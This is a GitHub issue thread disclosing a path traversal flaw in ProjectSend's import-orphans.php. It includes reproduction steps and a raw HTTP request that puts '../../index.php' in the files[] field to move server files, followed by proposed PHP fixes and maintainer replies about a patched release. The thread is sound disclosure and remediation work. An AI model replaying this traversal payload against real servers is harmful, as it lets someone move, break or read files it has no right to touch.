
Path Traversal vulnerability in import-orphans.php #994

Open
KietNA-HPT opened this issue Sep 7, 2021 · 16 comments

Comments

@KietNA-HPT

KietNA-HPT commented Sep 7, 2021

Dear @ignacionelson,
I found a path traversal vulnerability in import-orphans.php.

Description

Because of lacking input sanitization for the files[] parameter, the attacker can add ../ to move any PHP file, or any file on the system that the web server has permissions for, into the /upload/files/ folder.

Steps To Reproduce

  1. Use the Burp Suite tool to capture the request of the import-orphans.php function.
  2. Add ../../[file name to move] in the files[] parameter; in this step the attacker can move PHP files with the aim of sabotaging the system, or read sensitive files on the system like passwd, the access log, ...
  3. Then access webroot/import-orphans.php to get the new name of the file.
  4. Then access webroot/upload/files/[new name of file].

Request to move the index.php file:

POST /import-orphans.php HTTP/1.1
Host: 172.16.0.12:4444
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------41162972056717011663508504951
Content-Length: 388
Origin: http://172.16.0.12:4444
Connection: close
Referer: http://172.16.0.12:4444/import-orphans.php
Cookie: PHPSESSID=7simdbjnrvdjpeq6bkvfukrdvt;
Upgrade-Insecure-Requests: 1

-----------------------------41162972056717011663508504951
Content-Disposition: form-data; name="csrf_token"

ccc780a3231d3f7544fe9eaa9f3aea28756bdbfd1df824b726865ebaf1505fa1
-----------------------------41162972056717011663508504951
Content-Disposition: form-data; name="files[]"

../../index.php
-----------------------------41162972056717011663508504951--

Then the webroot returned a directory listing, because index.php was moved to the /upload/files folder.

Solution:

// files[] is submitted as an array, so each entry has to be checked;
// reject the request as soon as any entry contains a "../" segment.
foreach ((array) $_POST['files'] as $file) {
    if (preg_match('/\.\.\//', $file) === 1) {
        die();
    }
}
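The check above is a denylist on one literal pattern. A stronger fix for the same class of bug is an allowlist: accept only bare filenames and confirm, after canonicalisation, that each one resolves to a regular file inside the upload directory. The following is an added example written for this thread, not ProjectSend's own code or its applied commit; the function name filter_orphan_files and the $uploadDir argument are assumptions, and the temporary directory and file names at the bottom are constructed for the demonstration.

```php
<?php
// Added example, not ProjectSend's code: restrict an orphan-import file list
// to names that resolve inside the upload directory. $uploadDir stands in for
// whatever configuration value the application uses (assumed name).

declare(strict_types=1);

/**
 * Return only those entries of $requested that name a regular file directly
 * inside $uploadDir. Entries with a directory component, with "." or ".."
 * segments, or that resolve outside the directory are dropped rather than
 * being passed on to a rename()/move.
 */
function filter_orphan_files(string $uploadDir, array $requested): array
{
    $base = realpath($uploadDir);
    if ($base === false) {
        return [];
    }
    // Trailing separator so that a prefix comparison cannot match a sibling
    // directory whose name merely starts with the upload directory's name.
    $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;

    $accepted = [];
    foreach ($requested as $name) {
        if (!is_string($name) || $name === '') {
            continue;
        }
        // Allowlist step 1: the value must already be a bare filename.
        // basename() strips any leading path, so "../../index.php" differs
        // from its basename and is rejected here.
        if ($name !== basename($name) || $name === '.' || $name === '..') {
            continue;
        }
        // Allowlist step 2: canonicalise and confirm the resolved path still
        // sits under $base. This also rejects symlinks pointing elsewhere.
        $resolved = realpath($base . $name);
        if ($resolved === false || strpos($resolved, $base) !== 0 || !is_file($resolved)) {
            continue;
        }
        $accepted[] = $name;
    }
    return $accepted;
}

// Demonstration with a constructed temporary upload directory.
$tmp = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'orphans_' . bin2hex(random_bytes(4));
mkdir($tmp);
file_put_contents($tmp . DIRECTORY_SEPARATOR . 'report.pdf', 'sample');

// Constructed input: one legitimate orphan, one traversal attempt,
// one nonexistent file and one bare ".." segment.
$input = ['report.pdf', '../../index.php', 'missing.txt', '..'];
var_dump(filter_orphan_files($tmp, $input)); // only "report.pdf" survives

unlink($tmp . DIRECTORY_SEPARATOR . 'report.pdf');
rmdir($tmp);
```

The two-step shape matters: the basename() comparison alone would still accept a symlink sitting in the upload directory, and the realpath() prefix test alone would accept a relative path that happens to resolve back into the directory, so keeping both gives a check that does not depend on which separator or encoding an input used.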
@shorefall

Nice find!

@KietNA-HPT (Author)

> Nice find!

Thank you very much,
But I think it's just a small bug.

@tazmanboo

tazmanboo commented Nov 6, 2021

I am not a programmer, just a user. Is this the same as this issue:

"Projectsend version r1295 is affected by a directory traversal vulnerability. Because of lacking sanitization input for files[] parameter, an attacker can add ../ to move all PHP files or any file on the system that has permissions to /upload/files/ folder.
Publish Date : 2021-10-11 Last Update Date : 2021-10-18"
This is the site that discusses the issue https://www.cvedetails.com/cve/CVE-2021-40887/.

If so, would you mind giving step-by-step instructions on how to solve this? We have a small non-profit and with this program our clients can upload their files to us. We need them to be secure. Thank you in advance.

@ignacionelson (Collaborator)

I'll implement the fix ASAP and try to get the new release out this week, which is focused on security fixes.

@kkplein

kkplein commented Nov 7, 2021

Thank you, that is very much needed and appreciated.

@tazmanboo

Thank you.

@kkplein

kkplein commented Nov 18, 2021

> I'll implement the fix ASAP and try to get the new release out this week, which is focused on security fixes

Can you already say when we can expect this security-focused release?

@ignacionelson (Collaborator)

@kkplein I'm working on adding recaptcha to the login form. That should be up today or tomorrow, and a release will follow a few days later after testing. Would you like to test it out before releasing?

@kkplein

kkplein commented Nov 18, 2021

Sure!

@ignacionelson (Collaborator)

r1330 beta

@kkplein I wasn't able to fully implement recaptcha for the login form yet, but the rest should all be ok. I'd really appreciate it if you can test this version out. Thank you!!

@kkplein

kkplein commented Nov 19, 2021

@ignacionelson I just downloaded, copied to the ps root folder, unzipped -o, logged on to the system, and everything worked perfectly. The system logged the upgrade in the activity log (masteruser updated ProjectSend to version 1330).
I clicked through all the menus, downloaded some sample files, etc. All seems to work just fine.
Is there anything particular you'd like me to check?

@ignacionelson (Collaborator)

@kkplein Thanks!!
I see on the other issue that the files list problem was solved in your case.
Normal usage is a good way to test :)

@kkplein

kkplein commented Nov 20, 2021

Good. Curious about others testing this. Are all known security issues solved in this release?

@ChadAragorn

@ignacionelson I'm just wondering if that fix for the directory traversal was ever implemented. I'm running r1335 and the proposed change above doesn't appear to be in place; I'm not a PHP dev though, so I'm not 100% sure that it hasn't been fixed.

@ignacionelson (Collaborator)

50fc348
The applied solution is different but should produce the same result.

@ChadAragorn

Okay, that's wonderful, thank you for the update. Could this issue be closed then?
